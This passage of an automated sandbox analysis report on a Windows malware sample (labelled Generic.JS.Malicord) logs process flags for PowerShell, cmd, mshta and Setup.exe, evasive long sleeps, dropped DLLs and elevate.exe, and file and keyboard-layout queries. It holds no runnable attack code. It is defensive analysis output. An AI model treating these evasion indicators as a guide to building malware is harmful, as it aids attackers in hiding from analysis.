Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3664 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2538 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2995 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1700 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vulkan-1.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 3664 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep count: 2538 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep count: 2995 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep count: 1700 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5820 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Queries keyboard layouts
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources Jump to behavior
